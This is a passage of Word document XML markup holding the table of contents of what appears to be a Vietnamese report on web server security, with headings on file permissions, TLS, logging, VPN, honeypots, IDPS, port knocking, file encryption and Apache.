                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AF0B7E3" w14:textId="5099E863" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085484" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Các biện pháp bảo mật cơ bản của Web Server</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085484 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FCB54CE" w14:textId="462B1557" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085485" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Quyền đối với file (File permissions)</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085485 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16815EC5" w14:textId="20313800" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085486" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bảo vệ máy chủ bằng SSL (TLS)</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085486 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C1D6FAC" w14:textId="11B71E2E" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085487" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.3.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ghi nhật kí thông tin trên Web Server</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085487 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10521DF6" w14:textId="6BF62A19" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085488" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.4.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sử dụng VPN để tăng cường bảo mật</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085488 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39541F3D" w14:textId="7CD6068A" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085489" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Các biện pháp bảo mật tiên tiến của Web Server</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085489 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B3F3BD4" w14:textId="75C56A4B" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085490" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Xây dựng Honey Pots</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085490 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73E71798" w14:textId="2A7F1028" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085491" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sử dụng IDPS</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085491 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03810B7F" w14:textId="130EAD0B" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085492" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.3.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gõ cửa cổng (Port-Knocking) trên Web Server</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085492 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08A2C28F" w14:textId="2D8342D0" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085493" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.4.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mã hóa hệ thống tệp tin</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085493 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="670E9CFF" w14:textId="6C706A4B" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085494" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHƯƠNG 3: APACHE VÀ BẢO MẬT TRÊN APACHE</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085494 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36A9D38E" w14:textId="2F4D74ED" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085498" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tổng quan về Apache</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
